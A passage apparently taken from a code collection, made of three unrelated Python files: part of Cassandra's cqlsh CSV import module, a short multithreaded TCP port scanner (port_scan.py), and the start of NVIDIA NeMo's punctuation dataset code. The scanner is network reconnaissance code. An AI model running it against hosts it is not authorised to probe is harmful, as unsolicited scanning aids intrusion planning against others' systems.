statement.keyspace = self.ks
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
if len(batch['rows']) == 1:
statement = SimpleStatement(query % (','.join(batch['rows'][0]),), consistency_level=self.consistency_level)
else:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement._statements_and_parameters = [(False, query % (','.join(r),), ()) for r in batch['rows']]
statement.replicas = replicas
statement.keyspace = self.ks
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception, err:
errors[err.message].append(r)
return None
converted_rows = filter(None, [convert_row(r) for r in rows])
if errors:
for msg, rows in errors.iteritems():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
if batch['attempts'] < failing_batch['failures']:
statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
return None # carry on as normal
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
guarantee common replicas across partition keys. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
it may not be possible, in this case it helps to increase the CHUNK SIZE but up to a limit, otherwise
we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception, e:
errors[e.message].append(row)
if errors:
for msg, rows in errors.iteritems():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.iteritems():
if len(rows) > min_batch_size:
for i in xrange(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[filter_replicas(replicas[ring_pos])[:1]].extend(rows)
# Now send the batches by replica
for replicas, rows in rows_by_replica.iteritems():
for i in xrange(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
self.outmsg.send(ImportTaskError(err.__class__.__name__, err.message, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
remaining_time = time_difference - self.update_interval
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
|
port_scan.py
|
# import pdb
import socket, threading
from traceback import print_exc
class AllThreadsStarted(Exception): pass
class IPv4PortScanner(object):
def __init__(self, domain, timeout=2.0, port_range=(1024, 65535), threadcount=10):
self.domain = domain
self.timeout = timeout
self.port_range = port_range
self.threadcount = threadcount
self._lock = threading.Lock()
self._condition = threading.Condition(self._lock)
self._ports_active = []
self._ports_being_checked = []
self._next_port = self.port_range[0]
def check_port_(self, port):
"If connects then port is active"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(self.timeout)
try:
sock.connect((self.domain, port))
with self._lock:
self._ports_active.append(port)
print ("Found active port {}".format(port))
sock.close()
except socket.timeout, ex:
return
except:
print_exc()
# pdb.set_trace()
def check_port(self, port):
"updates self._ports_being_checked list on exit of this method"
try:
self.check_port_(port)
finally:
self._condition.acquire()
self._ports_being_checked.remove(port)
self._condition.notifyAll()
self._condition.release()
def start_another_thread(self):
if self._next_port > self.port_range[1]:
raise AllThreadsStarted()
port = self._next_port
self._next_port += 1
t = threading.Thread(target=self.check_port, args=(port,))
# update books
with self._lock:
self._ports_being_checked.append(port)
t.start()
def run(self):
try:
while True:
self._condition.acquire()
while len(self._ports_being_checked) >= self.threadcount:
# we wait for some threads to complete the task
self._condition.wait()
slots_available = self.threadcount - len(self._ports_being_checked)
self._condition.release()
print ("Checking {} - {}".format(self._next_port, self._next_port+slots_available))
for i in xrange(slots_available):
self.start_another_thread()
except AllThreadsStarted, ex:
print ("All threads started ...")
except:
print_exc()
if __name__ == "__main__":
import sys
domain = sys.argv[1]
port_s = int(sys.argv[2])
port_e = int(sys.argv[3])
scanner = IPv4PortScanner(domain=domain, port_range=(port_s, port_e))
scanner.run()
|
punctuation_capitalization_dataset.py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'BertPunctuationCapitalizationDataset',
'LABEL_ID_DIR_FOR_NEMO_CHECKPOINT',
'Progress',
'PunctuationCapitalizationEvalDataConfig',
'PunctuationCapitalizationLexicalAudioTrainDataConfig',
'PunctuationCapitalizationLexicalAudioEvalDataConfig',
'PunctuationCapitalizationTrainDataConfig',
'create_label_ids',
'create_masks_and_segment_ids',
'is_legacy_data_config',
'legacy_data_config_to_new_data_config',
'load_label_ids',
'raise_not_equal_labels_error',
'save_label_ids',
]
import itertools
import multiprocessing as mp
import os
import pickle
import random
from dataclasses import dataclass
from math import ceil
from pathlib import Path
from queue import Empty
from time import sleep
from typing import Any, Dict, List, Optional, Set, Tuple, Union
import numpy as np
import torch
from omegaconf import MISSING, DictConfig, OmegaConf
from tqdm import tqdm
from nemo.collections.common.tokenizers.tokenizer_spec import TokenizerSpec
from nemo.collections.nlp.data.data_utils.data_preprocessing import get_label_stats, get_stats
from nemo.core.classes import Dataset
from nemo.core.neural_types import ChannelType, LabelsType, MaskType, NeuralType
from nemo.utils import logging
from nemo.utils.get_rank import is_global_rank_zero
MAX_NUM_QUERIES_IN_SPLIT = 10 ** 4
TOKENIZATION_PROGRESS_REPORT_PERIOD = 10 ** 3
BATCH_MARK_UP_PROGRESS_REPORT_PERIOD = 10 ** 4
BATCH_BUILDING_PROGRESS_REPORT_PERIOD = 10 ** 4
LABEL_ID_DIR_FOR_NEMO_CHECKPOINT = "label_id_files_for_nemo_checkpoint"
@dataclass
class PunctuationCapitalizationDataConfigBase:
"""A base class for punctuation and capitalization data configs. This class does not define ``ds_item``
attribute which works differently for train and evaluation data."""
###################################################
# PARAMETERS COMMON FOR REGULAR AND TARRED DATASETS
###################################################
use_tarred_dataset: bool = MISSING
"""Whether to use tarred dataset. If True, then you should provide ``tar_metadata_file``. Otherwise, you should
provide ``text_file``, ``labels_file``, ``tokens_in_batch``."""
label_info_save_dir: Optional[str] = None
"""A path to a directory where files created during dataset processing are stored. These files include label id
files and label stats files. By default, it is a directory containing ``text_file`` or ``tar_metadata_file``.
You may need this parameter if dataset directory is read-only and thus does not allow saving anything near dataset
files"""
#################################################
# REGULAR DATASET PARAMETERS
#################################################
text_file: Optional[str] = None
"""A path to a file with source text data without punctuation and capitalization."""
labels_file: Optional[str] = None
"""A path to a file with punctuation and capitalization labels in NeMo format. NeMo format is described in
`documentation
<https://docs.nvidia.com/deeplearning/nemo/user-guide/docs/en/main/nlp/punctuation_and_capitalization.html#nemo-data-format>`_
"""
tokens_in_batch: Optional[int] = None
"""Number of tokens in a batch including paddings and special tokens ([CLS], [SEP], [UNK]). This config does
not have ``batch_size`` parameter."""
max_seq_length: int = 512
"""Max number of tokens in a source sequence. ``max_seq_length`` includes [CLS] and [SEP] tokens. Sequences
which are too long will be clipped by removal of tokens from the end of a sequence."""
num_samples: int = -1
"""A number of samples loaded from ``text_file`` and ``labels_file`` which are used in the dataset. If this
parameter equals ``-1``, then all samples are used."""
use_cache: bool = True
"""Whether to use pickled features. If pickled features file does not exist or ``use_cache=False``, then features
are pickled in ``cache_dir``. Pickled features include input ids, subtokens mask (mask of first tokens in words),
encoded punctuation and capitalization labels, label ids. Features creation consumes considerable time and this
``use_cache=True`` significantly speeds up training starting. Pickled features are also used for sharing features
between processes if data parallel training is used."""
cache_dir: Optional[str] = None
"""A path to a directory containing cache or directory where newly created cache is saved. By default, it is
a directory containing ``text_file``. You may need this parameter if cache for a dataset is going to be created
and the dataset directory is read-only.
``cache_dir`` and ``label_info_save_dir`` are separate parameters for the case when a cache is ready and this cache
is stored in a read only directory. In this case you will separate ``label_info_save_dir``."""
get_label_frequences: bool = False
"""Whether to show and save label frequencies. Frequencies are showed if ``verbose`` parameter is ``True``. If
``get_label_frequencies=True``, then frequencies are saved into ``label_info_save_dir``"""
verbose: bool = True
"""If ``True`` dataset instance will print progress messages and examples of acquired features."""
n_jobs: Optional[int] = 0
"""Number of workers used for features creation (tokenization, label encoding, and clipping). If 0, then
multiprocessing is not used; if ``None``, then n_jobs is equal to the number of CPU cores.
There can be weird deadlocking errors with some tokenizers (e.g. SentencePiece) if ``n_jobs`` is greater than zero.
"""
#################################################
# TARRED DATASET PARAMETERS
#################################################
tar_metadata_file: Optional[str] = None
"""A path to tarred dataset metadata file. Tarred metadata file and other parts of tarred dataset are usually
created by the script
`examples/nlp/token_classification/data/create_punctuation_capitalization_tarred_dataset.py
<https://github.com/NVIDIA/NeMo/blob/main/examples/nlp/token_classification/data/create_punctuation_capitalization_tarred_dataset.py>`_
"""
tar_shuffle_n: int = 1
"""The size of shuffle buffer of `webdataset`. The number of batches which are permuted."""
#################################################
# PYTORCH DATALOADER PARAMETERS
#################################################
shuffle: bool = True
"""Shuffle batches every epoch. For regular training datasets, the parameter also activates batch repacking every
epoch. For tarred dataset, it would be only batches permutation."""
drop_last: bool = False
"""In cases when data parallelism is used, ``drop_last`` defines the way data pipeline behaves when some replicas
are out of data and some are not. If ``drop_last`` is ``True``, then epoch ends in the moment when any replica runs
out of data. If ``drop_last`` is ``False``, then the replica will replace missing batch with a batch from a pool of
batches that the replica has already processed. If data parallelism is not used, then parameter ``drop_last`` does
not do anything. For more information see ``torch.utils.data.distributed.DistributedSampler``"""
pin_memory: bool = True
"""See ``torch.utils.data.DataLoader`` documentation."""
num_workers: int = 8
"""See ``torch.utils.data.DataLoader`` documentation."""
persistent_workers: bool = True
"""See ``torch.utils.data.DataLoader`` documentation."""
@dataclass
class PunctuationCapitalizationLexicalAudioTrainDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[Any] = MISSING
audio_manifest_filepath: Optional[str] = MISSING
sample_rate: int = 8000
batch_size: int = 32
@dataclass
class PunctuationCapitalizationLexicalAudioEvalDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[Any] = MISSING
audio_manifest_filepath: Optional[str] = MISSING
sample_rate: int = 8000
batch_size: int = 32
@dataclass
class PunctuationCapitalizationTrainDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[str] = MISSING
"""Path to a directory where `tar_metadata_file` or `text_file` and `labels_file` lay."""
@dataclass
class PunctuationCapitalizationEvalDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[Any] = MISSING
"""Path to a directory where `tar_metadata_file` or `text_file` and `labels_file` lay. ``Any`` = ``str`` or
``List[str]``. If a ``List[str]``, then the model is tested or validated on several datasets."""
def is_legacy_data_config(ds_section: DictConfig) -> bool:
return 'use_tarred_dataset' not in ds_section
def legacy_data_config_to_new_data_config(
ds_section: DictConfig, legacy_dataset_section: DictConfig, train: bool
) -> DictConfig:
"""
Transform old style dataset to new format dataset.
Args:
ds_section: a ds section (``train_ds``, or ``validation_ds``, or ``test_ds``) from old style config. Such
section contain ``batch_size`` parameter.
legacy_dataset_section: a ``model.dataset`` section. ``model.dataset`` section contains ``data_dir`` parameter
train: ``True`` if ``train_ds`` is transformed and ``False`` otherwise
Returns:
New format dataset based on either ``PunctuationCapitalizationTrainDataConfig`` (``train=True``) or
``PunctuationCapitalizationEvalDataConfig`` (``train=False``)
"""
if train:
cls = PunctuationCapitalizationTrainDataConfig
ds_item = legacy_dataset_section.get('data_dir')
else:
cls = PunctuationCapitalizationEvalDataConfig
ds_item = ds_section.get('ds_item')
ds_item = legacy_dataset_section.get('data_dir') if ds_item is None else ds_item
if ds_item is None:
raise ValueError(
f"Data directory was not found in legacy config.\nspecific dataset configuration:\n"
f"{OmegaConf.to_yaml(ds_section)}\nmodel.dataset:\n{OmegaConf.to_yaml(legacy_dataset_section)}"
)
new_config = OmegaConf.structured(
cls(
use_tarred_dataset=False,
text_file=ds_section.text_file,
labels_file=ds_section.labels_file,
ds_item=ds_item,
max_seq_length=legacy_dataset_section.get(
'max_seq_length', PunctuationCapitalizationDataConfigBase.max_seq_length
),
)
)
return new_config
def _check_number_of_labels(
words: List[str],
query: str,
qi: int,
split_i: int,
punctuation_labels: List[str],
capitalization_labels: List[str],
) -> None:
if len(words) != len(punctuation_labels):
raise ValueError(
f"Number of punctuation labels for a query number {qi} in a split number {split_i} is not equal to "
f"number of words. Number of words: {len(words)}, number of punctuation labels: "
f"{len(punctuation_labels)}. First 100 characters of the query: '{query[:100]}', punctuation labels: "
f"'{punctuation_labels}'"
)
if len(words) != len(capitalization_labels):
raise ValueError(
f"Number of capitalization labels for a query number {qi} in a split number {split_i} is not equal to "
f"number of words. Number of words: {len(words)}, number of capitalization labels: "
f"{len(capitalization_labels)}. First 100 characters of the query: '{query[:100]}', "
f"capitalization labels: '{capitalization_labels}'"
)
def _show_prog(queues: Tuple[mp.Queue, ...], totals: List[int], descriptions: List[str], units: List[str]) -> None:
"""
Show several ``tqdm`` progress bars.
Args:
queues: a list of queues by which progress is delivered into this function. Each queue is responsible for one
progress bar. ``show_prog`` function extracts integers from ``queues`` elements and adds them to progress
bars. If value extracted from a queue equals ``-1``, then corresponding progress bar is closed. When all
progress bars are closed, this function returns.
totals: list of values 100% of progress bars. See more in a description of ``total`` parameter of
``tqdm.tqdm`` function
descriptions: list of descriptions of progress bars. See more in a description of ``desc`` parameter of
``tqdm.tqdm`` function
units: list of progress bar units. See more in a description of ``unit`` parameter of ``tqdm.tqdm`` function
"""
if not all([len(queues) == len(v) for v in [totals, descriptions, units]]):
raise ValueError(
f"All of parameters `queues`, `total_num_lines`, `descriptions`, `units` have to have equal lengths. "
f"len(queues)={len(queues)}, len(total_num_lines)={len(totals)}, "
f"len(descriptions)={len(descriptions)}, len(units)={len(units)}."
)
prog = [
tqdm(total=tt, desc=dd, unit=uu, unit_scale=True, position=i)
for i, (tt, dd, uu) in enumerate(zip(totals, descriptions, units))
]
finished = [False] * len(queues)
while True:
for i, queue in enumerate(queues):
stop = False
to_add = 0
try:
v = queue.get(block=False)
while v != -1:
to_add += v
v = queue.get(block=False)
stop = True
except Empty:
if to_add == 0 and not stop:
continue
prog[i].n += to_add
prog[i].update(0)
if prog[i].n >= totals[i]:
finished[i] = True
prog[i].close()
if stop:
if prog[i].n < totals[i]:
logging.warning(
f"Progress with description '{descriptions[i]}' terminated before progress bar "
f"reached 100%. prog.n={prog[i].n}, total_num_lines={totals[i]}"
)
finished[i] = True
prog[i].close()
if all(finished):
break
sleep(0.1)
class Progress:
"""
Manages several ``tqdm`` progress bars for multi process tasks. This class can be used as context manager.
The class starts separate process which creates and updates progress bars. Information to progress process is
passed via multiprocessing queues. There is a separate queue for every progress bar.
You can use it as context manager:
.. code-block:: python
with Progress([10, 20], ["progress bar 1", "progress bar 2"], ["parrot", "frog"]) as progress_queues:
num_processes = 10
with multiprocessing.Pool(num_processes) as pool:
data = list(zip(my_data, [progress_queues[0]] * num_processes, [progress_queues[1]] * num_processes))
pool.starmap(worker_func, data)
Or without context manager:
.. code-block:: python
progress = Progress([10, 20], ["progress bar 1", "progress bar 2"], ["parrot", "frog"])
progress_queues = progress.get_queue()
num_processes = 10
with multiprocessing.Pool(num_processes) as pool:
data = list(zip(my_data, [progress_queues[0]] * num_processes, [progress_queues[1]] * num_processes))
pool.starmap(worker_func, data)
progress.finish()
In a worker function you will have to put number of processed items into the progress queues. For example:
.. code-block:: python
def worker_func(my_datum, parrot_progress_queue, frog_progress_queue):
...
for i in range(10):
parrot_progress_queue.put(1)
frog_progress_queue.put(2)
Progress bars and progress process are closed when ``finish`` or ``__exit__`` methods are called.
"""
def __init__(self, total: Union[int, List[int]], desc: Union[str, List[str]], unit: Union[str, List[str]]) -> None:
"""
Starts progress process and creates queues for passing information to the progress process. Number of progress
bars is equal to the max length of lists ``total``, ``desc``, ``unit``. If none of these parameters is a list,
then 1 progress bar is created.
Args:
total: a list of ``int`` which length is equal to the number of progress bars OR an ``int`` OR a list of
one ``int``. Number which comprises 100% of progress bar. When sum of values passed through the
corresponding queue equals ``total`` corresponding progress bar reaches 100%. If ``total`` is an
``int`` or a list of one element, then all progress bars have equal ``total`` parameter.
desc: a list of ``str`` which length is equal to the number of progress bars OR a ``str`` OR a list of one
``str``. Description of a progress bar which is showed as a prefix. See more in description of
parameter ``desc`` of function ``tqdm.tqdm``.
unit: a list of ``str`` which length is equal to the number of progress bars OR a ``str`` OR a list of one
``str``. A unit of a progress bar. See more in description of parameter ``unit`` of function
``tqdm.tqdm``.
"""
if not isinstance(total, list):
total = [total]
if not isinstance(desc, list):
desc = [desc]
if not isinstance(unit, list):
unit = [unit]
num_processes = max([len(total), len(desc), len(unit)])
for param in [total, desc, unit]:
if len(param) not in [num_processes, 1]:
raise ValueError(
f"If parameter of `Progress.__init__` method is a list, then it has to be the same length as other "
f"parameters which are lists"
)
if len(param) == 1:
param *= num_processes
manager = mp.Manager()
self.progress_queues = tuple(manager.Queue() for _ in range(num_processes))
self.progress_process = mp.Process(target=_show_prog, args=(self.progress_queues, total, desc, unit))
self.progress_process.start()
def __enter__(self) -> Tuple[mp.Queue, ...]:
return self.get_queues()
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self.finish()
def get_queues(self) -> Tuple[mp.Queue, ...]:
return self.progress_queues
def finish(self) -> None:
for q in self.progress_queues:
q.put(-1)
self.progress_process.join()
class TokenizeCreateMasksClipWorker:
"""A worker for tokenization, encoding labels, creating masks for first token in a word, sequence clipping"""
def __init__(
self,
max_seq_length: int,
tokenizer: TokenizerSpec,
punct_label_ids: Optional[Dict[str, int]],
capit_label_ids: Optional[Dict[str, int]],
pad_label: str,
verbose: bool,
progress_queue: mp.Queue,
) -> None:
"""
Args:
max_seq_length: max number of tokens in an input sequence including [CLS] and [SEP] tokens. If number of
tokens in a sequence exceeds ``max_seq_length``, then excess tokens in the end of the sequence
are removed
tokenizer: a tokenizer instance which has properties ``cls_id``, ``pad_id``, ``sep_id``, ``unk_id``
punct_label_ids: dict to map punctuation labels to label ids. Starts with pad_label->0.
capit_label_ids: dict to map capitalization labels to label ids. Starts with pad_label->0.
pad_label: pad value use for labels. By default, it's the neutral label for punctuation and capitalization.
Its id in ``punct_label_ids`` and ``capit_label_ids`` has to be ``0``
verbose: whether to report when the worker finishes its job
progress_queue: a multiprocessing queue used for reporting progress. Useful for creating tarred dataset
"""
self.max_seq_length = max_seq_length
self.tokenizer = tokenizer
self.punct_label_ids = punct_label_ids
self.capit_label_ids = capit_label_ids
self.pad_label = pad_label
self.verbose = verbose
self.progress_queue = progress_queue
def _maybe_clip(self, values: List[int], append_value: int) -> List[int]:
if len(values) > self.max_seq_length:
return values[: self.max_seq_length - 1] + [append_value]
return values
def __call__(
self,
queries: List[str],
punct_label_lines: Optional[Union[List[str], Tuple[str, ...]]],
capit_label_lines: Optional[Union[List[str], Tuple[str, ...]]],
split_i: int,
) -> Tuple[List[np.ndarray], List[np.ndarray], List[np.ndarray], List[np.ndarray]]:
"""
Tokenize, clip, encode labels, and create masks of first tokens in words.
Args:
queries: text sequences
punct_label_lines: a list or a tuple of labels for every word in a sequence (str)
capit_label_lines: a list of a tuple labels for every word in a sequence (str)
split_i: number of a split which is processed. Used for logging
Returns:
input_ids: a list of 1D int32 arrays. Each array contains token ids of the corresponding query
subtokens_mask: a list of 1D boolean arrays. An array element is ``True`` if corresponding token is the
first token in a word
punct_labels: a list of 1D int32 arrays. Encoded punctuation labels for every token in a query. Tokens in
one word have identical labels
capit_labels: a list of 1D int32 arrays. Encoded capitalization labels for every token in a query. Tokens
in one word have identical labels
"""
all_input_ids, all_subtokens_mask, punct_all_labels, capit_all_labels = [], [], [], []
progress_made = 0
for i, query in enumerate(queries):
words = query.split()
input_ids, subtokens_mask = [self.tokenizer.cls_id], [0]
_check_number_of_labels(words, query, i, split_i, punct_label_lines[i], capit_label_lines[i])
pad_id = self.punct_label_ids[self.pad_label]
punct_labels = [pad_id]
punct_query_labels = [self.punct_label_ids[lab] for lab in punct_label_lines[i]]
capit_labels = [pad_id]
capit_query_labels = [self.capit_label_ids[lab] for lab in capit_label_lines[i]]
for j, word in enumerate(words):
word_ids = self.tokenizer.text_to_ids(word)
if not word_ids and len(word):
word_ids = [self.tokenizer.unk_id]
input_ids.extend(word_ids)
subtokens_mask.append(1)
subtokens_mask.extend([0] * (len(word_ids) - 1))
punct_labels.extend([punct_query_labels[j]] * len(word_ids))
capit_labels.extend([capit_query_labels[j]] * len(word_ids))
# add eos token
input_ids.append(self.tokenizer.sep_id)
subtokens_mask.append(0)
all_input_ids.append(np.array(self._maybe_clip(input_ids, self.tokenizer.sep_id), dtype=np.int32))
all_subtokens_mask.append(np.array(self._maybe_clip(subtokens_mask, 0), dtype=bool))
punct_labels.append(pad_id)
punct_all_labels.append(np.array(self._maybe_clip(punct_labels, pad_id), dtype=np.int32))
capit_labels.append(pad_id)
capit_all_labels.append(np.array(self._maybe_clip(capit_labels, pad_id), dtype=np.int32))
progress_made += 1
if progress_made >= TOKENIZATION_PROGRESS_REPORT_PERIOD:
self.progress_queue.put(progress_made)
progress_made = 0
self.progress_queue.put(progress_made)
if self.verbose:
logging.info(f"Finished processing data split number {split_i}")
return all_input_ids, all_subtokens_mask, punct_all_labels, capit_all_labels
def _get_features(
queries: Union[List[str], Tuple[str, ...]],
punct_label_lines: Union[List[str], Tuple[str, ...]],
capit_label_lines: Union[List[str], Tuple[str, ...]],
max_seq_length: int,
tokenizer: TokenizerSpec,
punct_label_ids: Dict[str, int] = None,
capit_label_ids: Dict[str, int] = None,
pad_label: str = 'O',
verbose: bool = True,
n_jobs: Optional[int] = 0,
progress_queue: Optional[mp.Queue] = None,
) -> Tuple[List[np.ndarray], List[np.ndarray], List[np.ndarray], List[np.ndarray]]:
"""
Tokenizes data, encodes labels, creates masks of first tokens in words, clips sequences by number of tokens.
Args:
queries: text sequences
max_seq_length: max number of tokens in an input sequence including [CLS] and [SEP] tokens. If number of tokens
in a sequence exceeds ``max_seq_length``, then excess tokens in the end of the sequence are removed
tokenizer: a tokenizer instance which has properties ``cls_id``, ``pad_id``, ``sep_id``, ``unk_id``
punct_label_ids: dict to map punctuation labels to label ids. Starts with pad_label->0.
capit_label_ids: dict to map capitalization labels to label ids. Starts with pad_label->0.
pad_label: pad value use for labels. By default, it's the neutral label for punctuation and capitalization.
Its id in ``punct_label_ids`` and ``capit_label_ids`` has to be ``0``
punct_label_lines: a list of a tuple of labels for every word in a sequence (str)
capit_label_lines: a list or a tuple of labels for every word in a sequence (str)
verbose: whether to show examples of tokenized data and various progress information
n_jobs: a number of workers used for preparing features. If ``n_jobs <= 0``, then do not use multiprocessing
and run features creation in this process. If not set, number of workers will be equal to the number of
CPUs.
!!WARNING!!
There can be deadlocking problems with some tokenizers (e.g. SentencePiece, HuggingFace AlBERT)
if ``n_jobs > 0``.
progress_queue: a multiprocessing queue used for reporting progress. Useful for creating tarred dataset
Returns:
input_ids: a list of 1D int32 arrays. Each array contains token ids of corresponding query
subtokens_mask: a list of 1D boolean arrays. An array element is ``True`` if corresponding token is the
first token in a word
punct_labels: a list of 1D int32 arrays. Encoded punctuation labels for every token in a query. Tokens in one
word have identical labels.
capit_labels: a list of 1D int32 arrays. Encoded capitalization labels for every token in a query. Tokens in
one word have identical labels
"""
if verbose:
logging.info("Start initial tokenization.")
create_progress_process = progress_queue is None
if n_jobs is None:
n_jobs = min(mp.cpu_count(), len(queries))
if verbose:
logging.info(f"Running tokenization with {n_jobs} jobs.")
# Number of queries in split
split_size = min(len(queries) // max(n_jobs, 1), MAX_NUM_QUERIES_IN_SPLIT)
n_split = len(queries) // split_size
split_queries = [queries[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)] + [
queries[split_size * (n_split - 1) :]
]
split_punct_labels_lines = [
punct_label_lines[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)
] + [punct_label_lines[split_size * (n_split - 1) :]]
split_capit_labels_lines = [
capit_label_lines[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)
] + [capit_label_lines[split_size * (n_split - 1) :]]
args = list(zip(split_queries, split_punct_labels_lines, split_capit_labels_lines, range(n_split)))
if create_progress_process:
progress = Progress(len(queries), "Tokenization", "query")
progress_queue = progress.get_queues()[0]
if n_jobs > 0:
with mp.Pool(n_jobs) as pool:
result = pool.starmap(
TokenizeCreateMasksClipWorker(
max_seq_length, tokenizer, punct_label_ids, capit_label_ids, pad_label, verbose, progress_queue
),
args,
)
else:
result = []
for x in args:
result.append(
TokenizeCreateMasksClipWorker(
max_seq_length, tokenizer, punct_label_ids, capit_label_ids, pad_label, verbose, progress_queue,
)(*x)
)
if create_progress_process:
progress.finish()
input_ids, subtokens_mask, punct_labels, capit_labels = tuple(list(itertools.chain(*e)) for e in zip(*result))
if verbose:
logging.info("Finished initial tokenization.")
get_stats([len(inp) for inp in input_ids])
logging.info(f"Finished clipping and padding.")
for i in range(min(len(input_ids), 5)):
logging.info("*** Example ***")
logging.info("i: %s" % (i))
logging.info("subtokens: %s" % " ".join(list(map(str, input_ids[i]))))
logging.info("subtokens_mask: %s" % " ".join(list(map(str, subtokens_mask[i]))))
logging.info("punct_labels: %s" % " ".join(list(map(str, punct_labels[i]))))
logging.info("capit_labels: %s" % " ".join(list(map(str, capit_labels[i]))))
return input_ids, subtokens_mask, punct_labels, capit_labels
def create_masks_and_segment_ids(
input_ids: np.ndarray,
subtokens_mask: np.ndarray,
pad_id: int,
cls_id: int,
sep_id: int,
ignore_start_end: bool,
ignore_extra_tokens: bool,
